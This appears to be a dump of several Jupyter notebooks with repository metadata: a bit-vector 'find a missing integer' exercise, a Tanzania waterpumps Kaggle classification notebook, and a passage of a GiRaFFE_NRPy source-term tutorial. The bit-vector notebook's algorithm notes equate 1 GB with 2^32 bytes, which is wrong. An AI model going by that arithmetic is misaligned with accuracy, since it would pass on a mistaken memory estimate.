"## Problem: Given an array of n integers, find an int not in the input. Use a minimal amount of memory.\n\n* [Constraints](#Constraints)\n* [Test Cases](#Test-Cases)\n* [Algorithm](#Algorithm)\n* [Code](#Code)\n* [Unit Test](#Unit-Test)",
"_____no_output_____"
],
[
"## Constraints\n\n* Are we working with non-negative ints?\n * Yes\n* What is the range of the integers?\n * Discuss the approach for 4 billion integers\n * Implement for 32 integers\n* Can we assume the inputs are valid?\n * No",
"_____no_output_____"
],
[
"## Test Cases\n\n* None -> Exception\n* [] -> Exception\n* General case\n * There is an int excluded from the input -> int\n * There isn't an int excluded from the input -> None",
"_____no_output_____"
],
[
"## Algorithm\n\nThe problem states to use a minimal amount of memory. We'll use a bit vector to keep track of the inputs.\n\nSay we are given 4 billion integers, which is 2^32 integers. The number of non-negative integers would be 2^31. With a bit vector, we'll need 4 billion bits to map each integer to a bit. Say we had only 1 GB of memory or 2^32 bytes. This would leave us with 8 billion bits.\n\nTo simplify this exercise, we'll work with an input of up to 32 ints that we'll map to a bit vector of 32 bits.\n\n<pre>\n\ninput = [0, 1, 2, 3, 4...28, 29, 31]\n\nbytes [ 1 ] [ 2 ] [ 3 ] [ 4 ]\nindex = 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31\nbit_vector = 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 0 1\n\nresult = 30\n\n* Loop through each item in the input, setting bit_vector[item] = True.\n* Loop through the bit_vector, return the first index where bit_vector[item] == False.\n\n</pre>\n\nComplexity:\n* Time: O(b), where b is the number of bits\n* Space: O(b)",
"_____no_output_____"
],
[
"## Code",
"_____no_output_____"
]
],
[
[
"from bitstring import BitArray # Run pip install bitstring\n\n\nclass Bits(object):\n\n def new_int(self, array, max_size):\n if not array:\n raise TypeError('array cannot be None or empty')\n bit_vector = BitArray(max_size)\n for item in array:\n bit_vector[item] = True\n for index, item in enumerate(bit_vector):\n if not item:\n return index\n return None",
"_____no_output_____"
]
],
[
[
"## Unit Test",
"_____no_output_____"
]
],
[
[
"# %%writefile test_new_int.py\nfrom nose.tools import assert_equal, assert_raises\n\n\nclass TestBits(object):\n\n def test_new_int(self):\n bits = Bits()\n max_size = 32\n assert_raises(TypeError, bits.new_int, None, max_size)\n assert_raises(TypeError, bits.new_int, [], max_size)\n data = [item for item in range(30)]\n data.append(31)\n assert_equal(bits.new_int(data, max_size), 30)\n data = [item for item in range(32)]\n assert_equal(bits.new_int(data, max_size), None)\n print('Success: test_find_int_excluded_from_input')\n\n\ndef main():\n test = TestBits()\n test.test_new_int()\n\n\nif __name__ == '__main__':\n main()",
"Success: test_find_int_excluded_from_input\n"
],
[
"%run -i test_new_int.py",
"Success: test_find_int_excluded_from_input\n"
]
]
] | [
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
]
] |
cb513860969d137c9bfaa801f0277b8a95cc82d1 | 41,889 | ipynb | Jupyter Notebook | module4-classification-metrics/LS_DS_224_assignment.ipynb | alex-pakalniskis/DS-Unit-2-Kaggle-Challenge | a41ed75e87f78b6d53658ea0f133595c72fd7a8c | [
"MIT"
] | null | null | null | module4-classification-metrics/LS_DS_224_assignment.ipynb | alex-pakalniskis/DS-Unit-2-Kaggle-Challenge | a41ed75e87f78b6d53658ea0f133595c72fd7a8c | [
"MIT"
] | null | null | null | module4-classification-metrics/LS_DS_224_assignment.ipynb | alex-pakalniskis/DS-Unit-2-Kaggle-Challenge | a41ed75e87f78b6d53658ea0f133595c72fd7a8c | [
"MIT"
] | null | null | null | 63.372163 | 20,552 | 0.750173 | [
[
[
"Lambda School Data Science\n\n*Unit 2, Sprint 2, Module 4*\n\n---",
"_____no_output_____"
],
[
"# Classification Metrics\n\n## Assignment\n- [ ] If you haven't yet, [review requirements for your portfolio project](https://lambdaschool.github.io/ds/unit2), then submit your dataset.\n- [ ] Plot a confusion matrix for your Tanzania Waterpumps model.\n- [ ] Continue to participate in our Kaggle challenge. Every student should have made at least one submission that scores at least 70% accuracy (well above the majority class baseline).\n- [ ] Submit your final predictions to our Kaggle competition. Optionally, go to **My Submissions**, and _\"you may select up to 1 submission to be used to count towards your final leaderboard score.\"_\n- [ ] Commit your notebook to your fork of the GitHub repo.\n- [ ] Read [Maximizing Scarce Maintenance Resources with Data: Applying predictive modeling, precision at k, and clustering to optimize impact](https://towardsdatascience.com/maximizing-scarce-maintenance-resources-with-data-8f3491133050), by Lambda DS3 student Michael Brady. His blog post extends the Tanzania Waterpumps scenario, far beyond what's in the lecture notebook.\n\n\n## Stretch Goals\n\n### Reading\n\n- [Attacking discrimination with smarter machine learning](https://research.google.com/bigpicture/attacking-discrimination-in-ml/), by Google Research, with interactive visualizations. _\"A threshold classifier essentially makes a yes/no decision, putting things in one category or another. We look at how these classifiers work, ways they can potentially be unfair, and how you might turn an unfair classifier into a fairer one. As an illustrative example, we focus on loan granting scenarios where a bank may grant or deny a loan based on a single, automatically computed number such as a credit score.\"_\n- [Notebook about how to calculate expected value from a confusion matrix by treating it as a cost-benefit matrix](https://github.com/podopie/DAT18NYC/blob/master/classes/13-expected_value_cost_benefit_analysis.ipynb)\n- [Visualizing Machine Learning Thresholds to Make Better Business Decisions](https://blog.insightdatascience.com/visualizing-machine-learning-thresholds-to-make-better-business-decisions-4ab07f823415)\n\n\n### Doing\n- [ ] Share visualizations in our Slack channel!\n- [ ] RandomizedSearchCV / GridSearchCV, for model selection. (See module 3 assignment notebook)\n- [ ] Stacking Ensemble. (See module 3 assignment notebook)\n- [ ] More Categorical Encoding. (See module 2 assignment notebook)",
"_____no_output_____"
]
],
[
[
"%%capture\nimport sys\n\n# If you're on Colab:\nif 'google.colab' in sys.modules:\n DATA_PATH = 'https://raw.githubusercontent.com/LambdaSchool/DS-Unit-2-Kaggle-Challenge/master/data/'\n !pip install category_encoders==2.*\n\n# If you're working locally:\nelse:\n DATA_PATH = '../data/'",
"_____no_output_____"
],
[
"import pandas as pd\nimport geopandas as gpd\nimport numpy as np\nimport matplotlib.pyplot as plt\n# Merge train_features.csv & train_labels.csv\ntrain = pd.merge(pd.read_csv(DATA_PATH+'waterpumps/train_features.csv'), \n pd.read_csv(DATA_PATH+'waterpumps/train_labels.csv'))\n\n# Read test_features.csv & sample_submission.csv\ntest = pd.read_csv(DATA_PATH+'waterpumps/test_features.csv')\nsample_submission = pd.read_csv(DATA_PATH+'waterpumps/sample_submission.csv')",
"_____no_output_____"
],
[
"train_wards = pd.read_csv(\"/home/alex/data/tanzania-pumps-rasterstats/train_wards.csv\")\ntest_wards = pd.read_csv(\"/home/alex/data/tanzania-pumps-rasterstats/test_wards.csv\")\n\ntrain_elev = pd.read_csv(\"/home/alex/data/tanzania-pumps-rasterstats/train_srtm_elevation.csv\")\ntest_elev = pd.read_csv(\"/home/alex/data/tanzania-pumps-rasterstats/test_srtm_elevation.csv\")",
"_____no_output_____"
],
[
"train_merged = train.merge(train_wards, on=\"id\").merge(train_elev, on=\"id\")\ntest_merged = test.merge(test_wards, on=\"id\").merge(test_elev, on=\"id\")",
"_____no_output_____"
],
[
"train_merged.columns",
"_____no_output_____"
],
[
"def clean_columns(df):\n dataframe = df.copy()\n dataframe.rename(columns={\"longitude_x\":\"longitude\",\"latitude_x\":\"latitude\"}, inplace=True)\n dataframe.drop([\"Unnamed: 0_x\",\"Unnamed: 0_y\",\"latitude_y\",\"longitude_y\",\"gps_height\"], axis=1, inplace=True)\n return dataframe\n \n ",
"_____no_output_____"
],
[
"train_clean = clean_columns(train_merged)\ntest_clean = clean_columns(test_merged)",
"_____no_output_____"
],
[
"from sklearn.model_selection import train_test_split\n",
"_____no_output_____"
],
[
"train_clean, validate_clean = train_test_split(\n train_clean, \n train_size=0.80, \n test_size=0.20, \n stratify=train['status_group'], \n random_state=42)",
"_____no_output_____"
],
[
"def wrangle(X):\n \"\"\"Wrangle train, validate, and test sets in the same way\"\"\"\n \n # Prevent SettingWithCopyWarning\n X = X.copy()\n \n # About 3% of the time, latitude has small values near zero,\n # outside Tanzania, so we'll treat these values like zero.\n X['latitude'] = X['latitude'].replace(-2e-08, 0)\n \n # When columns have zeros and shouldn't, they are like null values.\n # So we will replace the zeros with nulls, and impute missing values later.\n # Also create a \"missing indicator\" column, because the fact that\n # values are missing may be a predictive signal.\n cols_with_zeros = ['longitude', 'latitude', 'construction_year', \n 'gps_height', 'population']\n for col in cols_with_zeros:\n X[col] = X[col].replace(0, np.nan)\n X[col+'_MISSING'] = X[col].isnull()\n \n # Drop duplicate columns\n duplicates = ['quantity_group', 'payment_type']\n X = X.drop(columns=duplicates)\n \n # Drop recorded_by (never varies) and id (always varies, random)\n unusable_variance = ['recorded_by', 'id']\n X = X.drop(columns=unusable_variance)\n \n # Convert date_recorded to datetime\n X['date_recorded'] = pd.to_datetime(X['date_recorded'], infer_datetime_format=True)\n \n # Extract components from date_recorded, then drop the original column\n X['year_recorded'] = X['date_recorded'].dt.year\n X['month_recorded'] = X['date_recorded'].dt.month\n X['day_recorded'] = X['date_recorded'].dt.day\n X = X.drop(columns='date_recorded')\n \n # Engineer feature: how many years from construction_year to date_recorded\n X['years'] = X['year_recorded'] - X['construction_year']\n X['years_MISSING'] = X['years'].isnull()\n \n \n # return the wrangled dataframe\n return X",
"_____no_output_____"
],
[
"# The status_group column is the target\ntarget = 'status_group'\n\n# Get a dataframe with all train columns except the target\ntrain_features = train_clean.drop(columns=[target])\n\n# Get a list of the numeric features\nnumeric_features = train_features.select_dtypes(include='number').columns.tolist()\n\n# Get a series with the cardinality of the nonnumeric features\ncardinality = train_features.select_dtypes(exclude='number').nunique()\n\n# Get a list of all categorical features\ncategorical_features = cardinality.index.tolist()\n\n# Combine the lists \nfeatures = numeric_features + categorical_features",
"_____no_output_____"
],
[
"def reduce_cardinality_to_top_ten(feature, train, validate, test):\n \n # Get a list of the top 10 entries in feature of interest\n top10 = train[feature].value_counts()[:10].index\n \n train = train.copy()\n validate = validate.copy()\n test = test.copy()\n \n # At locations where the feature entry is NOT in the top 10,\n # replace the entry with 'OTHER'\n train.loc[~train[feature].isin(top10), feature] = 'OTHER'\n validate.loc[~validate[feature].isin(top10), feature] = 'OTHER'\n test.loc[~test[feature].isin(top10), feature] = 'OTHER'\n \n return train, validate, test",
"_____no_output_____"
],
[
"categorical_features_with_more_than_ten_categories = []\nfor feature in categorical_features:\n if len(train_clean[feature].unique()) > 10:\n categorical_features_with_more_than_ten_categories.append(feature)\n \ncategorical_features_with_more_than_ten_categories",
"_____no_output_____"
],
[
"for feature in categorical_features_with_more_than_ten_categories:\n train_clean, validate_clean, test_clean = reduce_cardinality_to_top_ten(feature, train_clean, validate_clean, test_clean)",
"_____no_output_____"
],
[
"X_train = train_clean[features]\nX_validate = validate_clean[features]\nX_test = test_clean[features]\n\ny_train = train_clean[target]\ny_validate = validate_clean[target]",
"_____no_output_____"
],
[
"import category_encoders as ce\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.impute import SimpleImputer\nfrom sklearn.pipeline import make_pipeline\nfrom sklearn.preprocessing import StandardScaler\n",
"_____no_output_____"
],
[
"pipeline = make_pipeline(\n ce.OrdinalEncoder(), \n SimpleImputer(), \n RandomForestClassifier(random_state=8, max_depth=32, max_features= 0.668819157886731, min_samples_leaf=2, n_estimators=370, n_jobs=-1))\n \npipeline.fit(X_train, y_train)\n\nprint(pipeline.score(X_train, y_train))\nprint(pipeline.score(X_validate, y_validate))",
"0.9709595959595959\n0.8085016835016835\n"
],
[
"pipeline = make_pipeline(\n ce.OrdinalEncoder(), \n SimpleImputer(), \n RandomForestClassifier(random_state=8, min_samples_leaf=2, n_jobs=-1, n_estimators=370))\n \npipeline.fit(X_train, y_train)\n\nprint(pipeline.score(X_train, y_train))\nprint(pipeline.score(X_validate, y_validate))",
"0.931523569023569\n0.813973063973064\n"
],
[
"pipeline = make_pipeline(\n ce.OrdinalEncoder(), \n SimpleImputer(), \n RandomForestClassifier(random_state=8, min_samples_leaf=2, n_jobs=-1, n_estimators=370, max_depth=32)\n)\n \npipeline.fit(X_train, y_train)\n\nprint(pipeline.score(X_train, y_train))\nprint(pipeline.score(X_validate, y_validate))",
"0.9308712121212122\n0.8146464646464646\n"
],
[
"y_pred = pipeline.predict(X_test)\nsubmission = sample_submission.copy()\nsubmission['status_group'] = y_pred\nsubmission",
"_____no_output_____"
],
[
"submission.to_csv('/home/alex/code/DS-Unit-2-Kaggle-Challenge/module4-classification-metrics/alex-pakalniskis-kaggle-submission-day-4.1.csv', index=False)\n",
"_____no_output_____"
],
[
"from sklearn.metrics import plot_confusion_matrix\n\nplot_confusion_matrix(pipeline, X_validate, y_validate, values_format='.0f', xticks_rotation=\"vertical\")\n\nplt.show()",
"_____no_output_____"
],
[
"from sklearn.metrics import classification_report\ny_pred = pipeline.predict(X_validate)\nprint(classification_report(y_validate, y_pred))",
" precision recall f1-score support\n\n functional 0.80 0.92 0.85 6452\nfunctional needs repair 0.62 0.27 0.37 863\n non functional 0.86 0.78 0.82 4565\n\n accuracy 0.81 11880\n macro avg 0.76 0.65 0.68 11880\n weighted avg 0.81 0.81 0.80 11880\n\n"
]
]
] | [
"markdown",
"code"
] | [
[
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb513ceaddc0ca4cd8e08c18ba3900e05c80aad3 | 20,239 | ipynb | Jupyter Notebook | in_progress/Tutorial-GiRaFFE_NRPy-Source_Terms.ipynb | fedelopezar/nrpytutorial | 753acd954be4a2f99639c9f9fd5e623689fc7493 | [
"BSD-2-Clause"
] | 1 | 2021-12-13T05:51:18.000Z | 2021-12-13T05:51:18.000Z | in_progress/Tutorial-GiRaFFE_NRPy-Source_Terms.ipynb | fedelopezar/nrpytutorial | 753acd954be4a2f99639c9f9fd5e623689fc7493 | [
"BSD-2-Clause"
] | null | null | null | in_progress/Tutorial-GiRaFFE_NRPy-Source_Terms.ipynb | fedelopezar/nrpytutorial | 753acd954be4a2f99639c9f9fd5e623689fc7493 | [
"BSD-2-Clause"
] | null | null | null | 52.432642 | 439 | 0.575671 | [
[
[
"<script async src=\"https://www.googletagmanager.com/gtag/js?id=UA-59152712-8\"></script>\n<script>\n window.dataLayer = window.dataLayer || [];\n function gtag(){dataLayer.push(arguments);}\n gtag('js', new Date());\n\n gtag('config', 'UA-59152712-8');\n</script>\n\n# `GiRaFFE_NRPy`: Source Terms\n\n## Author: Patrick Nelson\n\n<a id='intro'></a>\n\n**Notebook Status:** <font color=green><b> Validated </b></font>\n\n**Validation Notes:** This code produces the expected results for generated functions.\n\n## This module presents the functionality of [GiRaFFE_NRPy_Source_Terms.py](../../edit/in_progress/GiRaFFE_NRPy/GiRaFFE_NRPy_Source_Terms.py).\n\n## Introduction: \nThis writes and documents the C code that `GiRaFFE_NRPy` uses to compute the source terms for the right-hand sides of the evolution equations for the unstaggered prescription.\n\nThe equations themselves are already coded up in other functions; however, for the $\\tilde{S}_i$ source term, we will need derivatives of the metric. It will be most efficient and accurate to take them using the interpolated metric values that we will have calculated anyway; however, we will need to write our derivatives in a nonstandard way within NRPy+ in order to take advantage of this, writing our own code for memory access.",
"_____no_output_____"
],
[
"<a id='toc'></a>\n\n# Table of Contents\n$$\\label{toc}$$\n\nThis notebook is organized as follows\n\n1. [Step 1](#stilde_source): The $\\tilde{S}_i$ source term\n1. [Step 2](#code_validation): Code Validation against original C code\n1. [Step 3](#latex_pdf_output): Output this notebook to $\\LaTeX$-formatted PDF file",
"_____no_output_____"
]
],
[
[
"# Step 0: Add NRPy's directory to the path\n# https://stackoverflow.com/questions/16780014/import-file-from-parent-directory\nimport os,sys\nnrpy_dir_path = os.path.join(\"..\")\nif nrpy_dir_path not in sys.path:\n sys.path.append(nrpy_dir_path)\n\nimport cmdline_helper as cmd\noutdir = os.path.join(\"GiRaFFE_NRPy\",\"GiRaFFE_Ccode_validation\",\"RHSs\")\ncmd.mkdir(outdir)",
"_____no_output_____"
]
],
[
[
"<a id='stilde_source'></a>\n\n## Step 1: The $\\tilde{S}_i$ source term \\[Back to [top](#toc)\\]\n$$\\label{stilde_source}$$\n\nWe start in the usual way - import the modules we need. We will also import the Levi-Civita symbol from `indexedexp.py` and use it to set the Levi-Civita tensor $\\epsilon^{ijk} = [ijk]/\\sqrt{\\gamma}$.",
"_____no_output_____"
]
],
[
[
"# Step 1: The StildeD RHS *source* term\nfrom outputC import outputC, outCfunction # NRPy+: Core C code output module\nimport indexedexp as ixp # NRPy+: Symbolic indexed expression (e.g., tensors, vectors, etc.) support\nimport GRHD.equations as GRHD # NRPy+: Generate general relativistic hydrodynamics equations\nimport GRFFE.equations as GRFFE # NRPy+: Generate general relativistic force-free electrodynamics equations\n\nthismodule = \"GiRaFFE_NRPy_Source_Terms\"\n\ndef generate_memory_access_code(gammaDD,betaU,alpha):\n # There are several pieces of C code that we will write ourselves because we need to do things\n # a little bit outside of what NRPy+ is built for.\n # First, we will write general memory access. We will read in values from memory at a given point\n # for each quantity we care about.\n global general_access\n general_access = \"\"\n for var in [\"GAMMADD00\", \"GAMMADD01\", \"GAMMADD02\",\n \"GAMMADD11\", \"GAMMADD12\", \"GAMMADD22\",\n \"BETAU0\", \"BETAU1\", \"BETAU2\",\"ALPHA\",\n \"BU0\",\"BU1\",\"BU2\",\n \"VALENCIAVU0\",\"VALENCIAVU1\",\"VALENCIAVU2\"]:\n lhsvar = var.lower().replace(\"dd\",\"DD\").replace(\"u\",\"U\").replace(\"bU\",\"BU\").replace(\"valencia\",\"Valencia\")\n # e.g.,\n # const REAL gammaDD00dD0 = auxevol_gfs[IDX4S(GAMMA_FACEDD00GF,i0,i1,i2)];\n general_access += \"const REAL \"+lhsvar+\" = auxevol_gfs[IDX4S(\"+var+\"GF,i0,i1,i2)];\\n\"\n\n # This quick function returns a nearby point for memory access. We need this because derivatives are not local operations.\n def idxp1(dirn):\n if dirn==0:\n return \"i0+1,i1,i2\"\n if dirn==1:\n return \"i0,i1+1,i2\"\n if dirn==2:\n return \"i0,i1,i2+1\"\n\n # Next we evaluate needed derivatives of the metric, based on their values at cell faces\n global metric_deriv_access\n metric_deriv_access = []\n# for dirn in range(3):\n# metric_deriv_access.append(\"\")\n# for var in [\"GAMMA_FACEDDdD00\", \"GAMMA_FACEDDdD01\", \"GAMMA_FACEDDdD02\",\n# \"GAMMA_FACEDDdD11\", \"GAMMA_FACEDDdD12\", \"GAMMA_FACEDDdD22\",\n# \"BETA_FACEUdD0\", \"BETA_FACEUdD1\", \"BETA_FACEUdD2\",\"ALPHA_FACEdD\"]:\n# lhsvar = var.lower().replace(\"dddd\",\"DDdD\").replace(\"udd\",\"UdD\").replace(\"dd\",\"dD\").replace(\"u\",\"U\").replace(\"_face\",\"\")\n# rhsvar = var.replace(\"dD\",\"\")\n# # e.g.,\n# # const REAL gammaDDdD000 = (auxevol_gfs[IDX4S(GAMMA_FACEDD00GF,i0+1,i1,i2)]-auxevol_gfs[IDX4S(GAMMA_FACEDD00GF,i0,i1,i2)])/dxx0;\n# metric_deriv_access[dirn] += \"const REAL \"+lhsvar+str(dirn)+\" = (auxevol_gfs[IDX4S(\"+rhsvar+\"GF,\"+idxp1(dirn)+\")]-auxevol_gfs[IDX4S(\"+rhsvar+\"GF,i0,i1,i2)])/dxx\"+str(dirn)+\";\\n\"\n# metric_deriv_access[dirn] += \"REAL Stilde_rhsD\"+str(dirn)+\";\\n\"\n # For this workaround, instead of taking the derivative of the metric components and then building the\n # four-metric, we build the four-metric and then take derivatives. Do this at i and i+1\n for dirn in range(3):\n metric_deriv_access.append(\"\")\n for var in [\"GAMMA_FACEDD00\", \"GAMMA_FACEDD01\", \"GAMMA_FACEDD02\",\n \"GAMMA_FACEDD11\", \"GAMMA_FACEDD12\", \"GAMMA_FACEDD22\",\n \"BETA_FACEU0\", \"BETA_FACEU1\", \"BETA_FACEU2\",\"ALPHA_FACE\"]:\n lhsvar = var.lower().replace(\"dd\",\"DD\").replace(\"u\",\"U\")\n rhsvar = var\n # e.g.,\n # const REAL gammaDD00 = auxevol_gfs[IDX4S(GAMMA_FACEDD00GF,i0,i1,i2)];\n metric_deriv_access[dirn] += \"const REAL \"+lhsvar+\" = auxevol_gfs[IDX4S(\"+rhsvar+\"GF,i0,i1,i2)];\\n\"\n # Read in at the next grid point\n for var in [\"GAMMA_FACEDD00\", \"GAMMA_FACEDD01\", \"GAMMA_FACEDD02\",\n \"GAMMA_FACEDD11\", \"GAMMA_FACEDD12\", \"GAMMA_FACEDD22\",\n \"BETA_FACEU0\", \"BETA_FACEU1\", \"BETA_FACEU2\",\"ALPHA_FACE\"]:\n lhsvar = var.lower().replace(\"dd\",\"DD\").replace(\"u\",\"U\").replace(\"_face\",\"_facep1\")\n rhsvar = var\n # e.g.,\n # const REAL gammaDD00 = auxevol_gfs[IDX4S(GAMMA_FACEDD00GF,i0+1,i1,i2)];\n metric_deriv_access[dirn] += \"const REAL \"+lhsvar+\" = auxevol_gfs[IDX4S(\"+rhsvar+\"GF,\"+idxp1(dirn)+\")];\\n\"\n metric_deriv_access[dirn] += \"REAL Stilde_rhsD\"+str(dirn)+\";\\n\"\n import BSSN.ADMBSSN_tofrom_4metric as AB4m\n AB4m.g4DD_ito_BSSN_or_ADM(\"ADM\",gammaDD,betaU,alpha)\n four_metric_vars = [\n AB4m.g4DD[0][0],\n AB4m.g4DD[0][1],\n AB4m.g4DD[0][2],\n AB4m.g4DD[0][3],\n AB4m.g4DD[1][1],\n AB4m.g4DD[1][2],\n AB4m.g4DD[1][3],\n AB4m.g4DD[2][2],\n AB4m.g4DD[2][3],\n AB4m.g4DD[3][3]\n ]\n four_metric_names = [\n \"g4DD00\",\n \"g4DD01\",\n \"g4DD02\",\n \"g4DD03\",\n \"g4DD11\",\n \"g4DD12\",\n \"g4DD13\",\n \"g4DD22\",\n \"g4DD23\",\n \"g4DD33\"\n ]\n global four_metric_C, four_metric_Cp1\n four_metric_C = outputC(four_metric_vars,four_metric_names,\"returnstring\",params=\"outCverbose=False,CSE_sorting=none\")\n for ii in range(len(four_metric_names)):\n four_metric_names[ii] += \"p1\"\n four_metric_Cp1 = outputC(four_metric_vars,four_metric_names,\"returnstring\",params=\"outCverbose=False,CSE_sorting=none\")\n four_metric_C = four_metric_C.replace(\"gamma\",\"gamma_face\").replace(\"beta\",\"beta_face\").replace(\"alpha\",\"alpha_face\").replace(\"{\",\"\").replace(\"}\",\"\").replace(\"g4\",\"const REAL g4\").replace(\"tmp_\",\"tmp_deriv\")\n four_metric_Cp1 = four_metric_Cp1.replace(\"gamma\",\"gamma_facep1\").replace(\"beta\",\"beta_facep1\").replace(\"alpha\",\"alpha_facep1\").replace(\"{\",\"\").replace(\"}\",\"\").replace(\"g4\",\"const REAL g4\").replace(\"tmp_\",\"tmp_derivp\")\n\n global four_metric_deriv\n four_metric_deriv = []\n for dirn in range(3):\n four_metric_deriv.append(\"\")\n for var in [\"g4DDdD00\", \"g4DDdD01\", \"g4DDdD02\", \"g4DDdD03\", \"g4DDdD11\",\n \"g4DDdD12\", \"g4DDdD13\", \"g4DDdD22\", \"g4DDdD23\", \"g4DDdD33\"]:\n lhsvar = var + str(dirn+1)\n rhsvar = var.replace(\"dD\",\"\")\n rhsvarp1 = rhsvar + \"p1\"\n # e.g.,\n # const REAL g44DDdD000 = (g4DD00p1 - g4DD00)/dxx0;\n four_metric_deriv[dirn] += \"const REAL \"+lhsvar+\" = (\"+rhsvarp1+\" - \"+rhsvar+\")/dxx\"+str(dirn)+\";\\n\"\n\n # This creates the C code that writes to the Stilde_rhs direction specified.\n global write_final_quantity\n write_final_quantity = []\n for dirn in range(3):\n write_final_quantity.append(\"\")\n write_final_quantity[dirn] += \"rhs_gfs[IDX4S(STILDED\"+str(dirn)+\"GF,i0,i1,i2)] += Stilde_rhsD\"+str(dirn)+\";\"\n\ndef write_out_functions_for_StildeD_source_term(outdir,outCparams,gammaDD,betaU,alpha,ValenciavU,BU,sqrt4pi):\n generate_memory_access_code(gammaDD,betaU,alpha)\n # First, we declare some dummy tensors that we will use for the codegen.\n gammaDDdD = ixp.declarerank3(\"gammaDDdD\",\"sym01\",DIM=3)\n betaUdD = ixp.declarerank2(\"betaUdD\",\"nosym\",DIM=3)\n alphadD = ixp.declarerank1(\"alphadD\",DIM=3)\n g4DDdD = ixp.declarerank3(\"g4DDdD\",\"sym01\",DIM=4)\n\n # We need to rerun a few of these functions with the reset lists to make sure these functions\n # don't cheat by using analytic expressions\n GRHD.compute_sqrtgammaDET(gammaDD)\n GRHD.u4U_in_terms_of_ValenciavU__rescale_ValenciavU_by_applying_speed_limit(alpha, betaU, gammaDD, ValenciavU)\n GRFFE.compute_smallb4U(gammaDD, betaU, alpha, GRHD.u4U_ito_ValenciavU, BU, sqrt4pi)\n GRFFE.compute_smallbsquared(gammaDD, betaU, alpha, GRFFE.smallb4U)\n GRFFE.compute_TEM4UU(gammaDD,betaU,alpha, GRFFE.smallb4U, GRFFE.smallbsquared,GRHD.u4U_ito_ValenciavU)\n# GRHD.compute_g4DD_zerotimederiv_dD(gammaDD,betaU,alpha, gammaDDdD,betaUdD,alphadD)\n GRHD.compute_S_tilde_source_termD(alpha, GRHD.sqrtgammaDET,g4DDdD, GRFFE.TEM4UU)\n for i in range(3):\n desc = \"Adds the source term to StildeD\"+str(i)+\".\"\n name = \"calculate_StildeD\"+str(i)+\"_source_term\"\n outCfunction(\n outfile = os.path.join(outdir,name+\".h\"), desc=desc, name=name,\n params =\"const paramstruct *params,const REAL *auxevol_gfs, REAL *rhs_gfs\",\n body = general_access \\\n +metric_deriv_access[i]\\\n +four_metric_C\\\n +four_metric_Cp1\\\n +four_metric_deriv[i]\\\n +outputC(GRHD.S_tilde_source_termD[i],\"Stilde_rhsD\"+str(i),\"returnstring\",params=outCparams).replace(\"IDX4\",\"IDX4S\")\\\n +write_final_quantity[i],\n loopopts =\"InteriorPoints\",\n rel_path_to_Cparams=os.path.join(\"../\"))\n",
"_____no_output_____"
]
],
[
[
"<a id='code_validation'></a>\n\n# Step 2: Code Validation against original C code \\[Back to [top](#toc)\\]\n$$\\label{code_validation}$$\n\nTo validate the code in this tutorial we check for agreement between the files\n\n1. that were written in this tutorial and\n1. those that are stored in `GiRaFFE_NRPy/GiRaFFE_Ccode_library` or generated by `GiRaFFE_NRPy_A2B.py`\n",
"_____no_output_____"
]
],
[
[
"# Declare gridfunctions necessary to generate the C code:\ngammaDD = ixp.register_gridfunctions_for_single_rank2(\"AUXEVOL\",\"gammaDD\",\"sym01\",DIM=3)\nbetaU = ixp.register_gridfunctions_for_single_rank1(\"AUXEVOL\",\"betaU\",DIM=3)\nalpha = gri.register_gridfunctions(\"AUXEVOL\",\"alpha\",DIM=3)\nBU = ixp.register_gridfunctions_for_single_rank1(\"AUXEVOL\",\"BU\",DIM=3)\nValenciavU = ixp.register_gridfunctions_for_single_rank1(\"AUXEVOL\",\"ValenciavU\",DIM=3)\nStildeD = ixp.register_gridfunctions_for_single_rank1(\"EVOL\",\"StildeD\",DIM=3)\n# Declare this symbol:\nsqrt4pi = par.Cparameters(\"REAL\",thismodule,\"sqrt4pi\",\"sqrt(4.0*M_PI)\")\n\n# First, we generate the file using the functions written in this notebook:\noutCparams = \"outCverbose=False\"\nwrite_out_functions_for_StildeD_source_term(outdir,outCparams,gammaDD,betaU,alpha,ValenciavU,BU,sqrt4pi)\n\n# Define the directory that we wish to validate against:\nvaldir = os.path.join(\"GiRaFFE_NRPy\",\"GiRaFFE_Ccode_library\",\"RHSs\")\ncmd.mkdir(valdir)\n\nimport GiRaFFE_NRPy.GiRaFFE_NRPy_Source_Terms as source\nsource.write_out_functions_for_StildeD_source_term(valdir,outCparams,gammaDD,betaU,alpha,ValenciavU,BU,sqrt4pi)\n\nimport difflib\nimport sys\n\nprint(\"Printing difference between original C code and this code...\")\n# Open the files to compare\nfiles = [\"calculate_StildeD0_source_term.h\",\"calculate_StildeD1_source_term.h\",\"calculate_StildeD2_source_term.h\"]\n\nfor file in files:\n print(\"Checking file \" + file)\n with open(os.path.join(valdir,file)) as file1, open(os.path.join(outdir,file)) as file2:\n # Read the lines of each file\n file1_lines = file1.readlines()\n file2_lines = file2.readlines()\n num_diffs = 0\n for line in difflib.unified_diff(file1_lines, file2_lines, fromfile=os.path.join(valdir+file), tofile=os.path.join(outdir+file)):\n sys.stdout.writelines(line)\n num_diffs = num_diffs + 1\n if num_diffs == 0:\n print(\"No difference. TEST PASSED!\")\n else:\n print(\"ERROR: Disagreement found with .py file. See differences above.\")\n sys.exit(1)",
